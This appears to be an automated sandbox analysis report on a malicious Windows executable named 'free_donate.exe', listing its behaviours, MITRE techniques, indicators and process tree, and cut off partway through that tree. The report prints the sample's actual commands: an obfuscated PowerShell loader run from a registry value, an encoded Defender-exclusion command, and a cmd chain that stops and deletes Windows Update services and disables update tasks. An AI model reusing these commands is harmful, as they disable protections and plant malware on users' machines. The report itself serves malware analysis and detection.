b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3

Analysis

max time kernel
150s
max time network
124s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
10-11-2022 19:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

free_donate.exe
Size

2.7MB
MD5

5026ed09cc5a093093461066d16a8f30
SHA1

34d60b874d9d3f8841c721692ea1daf31f330653
SHA256

b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3
SHA512

2429b9d55af9abe991a182b5fe49548d31986046c3bbacaa4021dd7544752f9b2e0b5c494c989b58daafaaf604e863abe3bd013125068331538618140d67a1f1
SSDEEP

49152:HgJH+Kol630+0DW0TOWxKyuPcMPgBAnDEQ1o/40fyNHpElUZ7lPP:AJgl630pBTXVGhPYzQ1o//wElulH

Score

10^/10

discovery evasion exploit persistence

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 1960 created 420 1960 powershell.EXE winlogon.exe

description	pid	process	target process
PID 1960 created 420	1960	powershell.EXE	winlogon.exe

Drops file in Drivers directory 2 IoCs

Processes:

updater.exefree_donate.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	updater.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	free_donate.exe

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

1736 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

960 takeown.exe
788 icacls.exe
1076 takeown.exe
1464 icacls.exe

pid	process
1736	updater.exe

pid	process
960	takeown.exe
788	icacls.exe
1076	takeown.exe
1464	icacls.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

services.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Program Files\\Google\\Libs\\WR64.sys"	services.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

868 cmd.exe
Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

1888 taskeng.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

788 icacls.exe
1076 takeown.exe
1464 icacls.exe
960 takeown.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

3 ip-api.com

pid	process
868	cmd.exe

pid	process
1888	taskeng.exe

pid	process
788	icacls.exe
1076	takeown.exe
1464	icacls.exe
960	takeown.exe

flow	ioc
3	ip-api.com

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.EXEpowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

free_donate.exepowershell.EXEupdater.exe

description	pid	process	target process
PID 1456 set thread context of 1576	1456	free_donate.exe	conhost.exe
PID 1960 set thread context of 1732	1960	powershell.EXE	dllhost.exe
PID 1736 set thread context of 1664	1736	updater.exe	dialer.exe
PID 1736 set thread context of 1516	1736	updater.exe	dialer.exe

Drops file in Program Files directory 3 IoCs

Processes:

free_donate.exeupdater.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	free_donate.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	free_donate.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1224 sc.exe
1552 sc.exe
808 sc.exe
1996 sc.exe
868 sc.exe
1964 sc.exe
1768 sc.exe
1076 sc.exe
688 sc.exe
1020 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1224	sc.exe
1552	sc.exe
808	sc.exe
1996	sc.exe
868	sc.exe
1964	sc.exe
1768	sc.exe
1076	sc.exe
688	sc.exe
1020	sc.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	wmiprvse.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1180 schtasks.exe

pid	process
1180	schtasks.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

powershell.EXEupdater.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a03a252137f5d801	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	updater.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	updater.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	updater.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1260	reg.exe
1996	reg.exe
1692	reg.exe
1672	reg.exe
692	reg.exe
1280	reg.exe
1948	reg.exe
604	reg.exe
276	reg.exe
544	reg.exe
1112	reg.exe
288	reg.exe
1748	reg.exe
1772	reg.exe
840	reg.exe
864	reg.exe
900	reg.exe
1556	reg.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

free_donate.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	free_donate.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	free_donate.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exefree_donate.exepowershell.EXEdllhost.exepowershell.exeupdater.exewmiprvse.exe

pid	process
948	powershell.exe
1456	free_donate.exe
1960	powershell.EXE
1960	powershell.EXE
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1600	powershell.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1736	updater.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
360	wmiprvse.exe
360	wmiprvse.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe
1732	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1360 Explorer.EXE
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

services.exe

pid process

464 services.exe

pid	process
1360	Explorer.EXE

pid	process
464	services.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exefree_donate.exepowercfg.exetakeown.exepowershell.EXEdllhost.exesvchost.exepowershell.exeupdater.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	948	powershell.exe
Token: SeShutdownPrivilege	1216	powercfg.exe
Token: SeShutdownPrivilege	1536	powercfg.exe
Token: SeShutdownPrivilege	1584	powercfg.exe
Token: SeDebugPrivilege	1456	free_donate.exe
Token: SeShutdownPrivilege	1956	powercfg.exe
Token: SeTakeOwnershipPrivilege	960	takeown.exe
Token: SeDebugPrivilege	1960	powershell.EXE
Token: SeDebugPrivilege	1960	powershell.EXE
Token: SeDebugPrivilege	1732	dllhost.exe
Token: SeAuditPrivilege	876	svchost.exe
Token: SeDebugPrivilege	1600	powershell.exe
Token: SeDebugPrivilege	1736	updater.exe
Token: SeShutdownPrivilege	604	powercfg.exe
Token: SeShutdownPrivilege	1632	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	876	svchost.exe
Token: SeIncreaseQuotaPrivilege	876	svchost.exe
Token: SeSecurityPrivilege	876	svchost.exe
Token: SeTakeOwnershipPrivilege	876	svchost.exe
Token: SeLoadDriverPrivilege	876	svchost.exe
Token: SeSystemtimePrivilege	876	svchost.exe
Token: SeBackupPrivilege	876	svchost.exe
Token: SeRestorePrivilege	876	svchost.exe
Token: SeShutdownPrivilege	876	svchost.exe
Token: SeSystemEnvironmentPrivilege	876	svchost.exe
Token: SeUndockPrivilege	876	svchost.exe
Token: SeManageVolumePrivilege	876	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	876	svchost.exe
Token: SeIncreaseQuotaPrivilege	876	svchost.exe
Token: SeSecurityPrivilege	876	svchost.exe
Token: SeTakeOwnershipPrivilege	876	svchost.exe
Token: SeLoadDriverPrivilege	876	svchost.exe
Token: SeSystemtimePrivilege	876	svchost.exe
Token: SeBackupPrivilege	876	svchost.exe
Token: SeRestorePrivilege	876	svchost.exe
Token: SeShutdownPrivilege	876	svchost.exe
Token: SeSystemEnvironmentPrivilege	876	svchost.exe
Token: SeUndockPrivilege	876	svchost.exe
Token: SeManageVolumePrivilege	876	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	876	svchost.exe
Token: SeIncreaseQuotaPrivilege	876	svchost.exe
Token: SeSecurityPrivilege	876	svchost.exe
Token: SeTakeOwnershipPrivilege	876	svchost.exe
Token: SeLoadDriverPrivilege	876	svchost.exe
Token: SeSystemtimePrivilege	876	svchost.exe
Token: SeBackupPrivilege	876	svchost.exe
Token: SeRestorePrivilege	876	svchost.exe
Token: SeShutdownPrivilege	876	svchost.exe
Token: SeSystemEnvironmentPrivilege	876	svchost.exe
Token: SeUndockPrivilege	876	svchost.exe
Token: SeManageVolumePrivilege	876	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	876	svchost.exe
Token: SeIncreaseQuotaPrivilege	876	svchost.exe
Token: SeSecurityPrivilege	876	svchost.exe
Token: SeTakeOwnershipPrivilege	876	svchost.exe
Token: SeLoadDriverPrivilege	876	svchost.exe
Token: SeSystemtimePrivilege	876	svchost.exe
Token: SeBackupPrivilege	876	svchost.exe
Token: SeRestorePrivilege	876	svchost.exe
Token: SeShutdownPrivilege	876	svchost.exe
Token: SeSystemEnvironmentPrivilege	876	svchost.exe
Token: SeUndockPrivilege	876	svchost.exe
Token: SeManageVolumePrivilege	876	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	876	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

conhost.exe

pid process

1604 conhost.exe
Suspicious use of UnmapMainImage 1 IoCs

Processes:

svchost.exe

pid process

876 svchost.exe

pid	process
1604	conhost.exe

pid	process
876	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

free_donate.execmd.execmd.exe

description	pid	process	target process
PID 1456 wrote to memory of 948	1456	free_donate.exe	powershell.exe
PID 1456 wrote to memory of 948	1456	free_donate.exe	powershell.exe
PID 1456 wrote to memory of 948	1456	free_donate.exe	powershell.exe
PID 1456 wrote to memory of 668	1456	free_donate.exe	cmd.exe
PID 1456 wrote to memory of 668	1456	free_donate.exe	cmd.exe
PID 1456 wrote to memory of 668	1456	free_donate.exe	cmd.exe
PID 1456 wrote to memory of 1760	1456	free_donate.exe	cmd.exe
PID 1456 wrote to memory of 1760	1456	free_donate.exe	cmd.exe
PID 1456 wrote to memory of 1760	1456	free_donate.exe	cmd.exe
PID 668 wrote to memory of 1996	668	cmd.exe	sc.exe
PID 668 wrote to memory of 1996	668	cmd.exe	sc.exe
PID 668 wrote to memory of 1996	668	cmd.exe	sc.exe
PID 1760 wrote to memory of 1216	1760	cmd.exe	powercfg.exe
PID 1760 wrote to memory of 1216	1760	cmd.exe	powercfg.exe
PID 1760 wrote to memory of 1216	1760	cmd.exe	powercfg.exe
PID 668 wrote to memory of 1224	668	cmd.exe	sc.exe
PID 668 wrote to memory of 1224	668	cmd.exe	sc.exe
PID 668 wrote to memory of 1224	668	cmd.exe	sc.exe
PID 668 wrote to memory of 1552	668	cmd.exe	sc.exe
PID 668 wrote to memory of 1552	668	cmd.exe	sc.exe
PID 668 wrote to memory of 1552	668	cmd.exe	sc.exe
PID 1760 wrote to memory of 1536	1760	cmd.exe	powercfg.exe
PID 1760 wrote to memory of 1536	1760	cmd.exe	powercfg.exe
PID 1760 wrote to memory of 1536	1760	cmd.exe	powercfg.exe
PID 668 wrote to memory of 868	668	cmd.exe	sc.exe
PID 668 wrote to memory of 868	668	cmd.exe	sc.exe
PID 668 wrote to memory of 868	668	cmd.exe	sc.exe
PID 668 wrote to memory of 1964	668	cmd.exe	sc.exe
PID 668 wrote to memory of 1964	668	cmd.exe	sc.exe
PID 668 wrote to memory of 1964	668	cmd.exe	sc.exe
PID 1760 wrote to memory of 1584	1760	cmd.exe	powercfg.exe
PID 1760 wrote to memory of 1584	1760	cmd.exe	powercfg.exe
PID 1760 wrote to memory of 1584	1760	cmd.exe	powercfg.exe
PID 668 wrote to memory of 288	668	cmd.exe	reg.exe
PID 668 wrote to memory of 288	668	cmd.exe	reg.exe
PID 668 wrote to memory of 288	668	cmd.exe	reg.exe
PID 668 wrote to memory of 1748	668	cmd.exe	reg.exe
PID 668 wrote to memory of 1748	668	cmd.exe	reg.exe
PID 668 wrote to memory of 1748	668	cmd.exe	reg.exe
PID 1760 wrote to memory of 1956	1760	cmd.exe	powercfg.exe
PID 1760 wrote to memory of 1956	1760	cmd.exe	powercfg.exe
PID 1760 wrote to memory of 1956	1760	cmd.exe	powercfg.exe
PID 668 wrote to memory of 1772	668	cmd.exe	reg.exe
PID 668 wrote to memory of 1772	668	cmd.exe	reg.exe
PID 668 wrote to memory of 1772	668	cmd.exe	reg.exe
PID 668 wrote to memory of 840	668	cmd.exe	reg.exe
PID 668 wrote to memory of 840	668	cmd.exe	reg.exe
PID 668 wrote to memory of 840	668	cmd.exe	reg.exe
PID 668 wrote to memory of 604	668	cmd.exe	reg.exe
PID 668 wrote to memory of 604	668	cmd.exe	reg.exe
PID 668 wrote to memory of 604	668	cmd.exe	reg.exe
PID 668 wrote to memory of 960	668	cmd.exe	takeown.exe
PID 668 wrote to memory of 960	668	cmd.exe	takeown.exe
PID 668 wrote to memory of 960	668	cmd.exe	takeown.exe
PID 668 wrote to memory of 788	668	cmd.exe	icacls.exe
PID 668 wrote to memory of 788	668	cmd.exe	icacls.exe
PID 668 wrote to memory of 788	668	cmd.exe	icacls.exe
PID 668 wrote to memory of 1672	668	cmd.exe	reg.exe
PID 668 wrote to memory of 1672	668	cmd.exe	reg.exe
PID 668 wrote to memory of 1672	668	cmd.exe	reg.exe
PID 668 wrote to memory of 276	668	cmd.exe	reg.exe
PID 668 wrote to memory of 276	668	cmd.exe	reg.exe
PID 668 wrote to memory of 276	668	cmd.exe	reg.exe
PID 668 wrote to memory of 544	668	cmd.exe	reg.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:480

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
PID:464

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
2⤵
PID:748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:876

C:\Windows\system32\taskeng.exe
taskeng.exe {6C54B0ED-02FB-4C15-80E3-0C9B1D98B544} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
- Loads dropped DLL
PID:1888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBhAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB5AGQAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAHUAbAAjAD4A"
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1600

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:2016

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:808

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:1768

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:1076

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:688

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:1020

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:864

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:1260

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies registry key
PID:1112

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:900

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:1556

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1076

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1464

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1996

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1280

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1692

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1948

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
6⤵
PID:768

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
6⤵
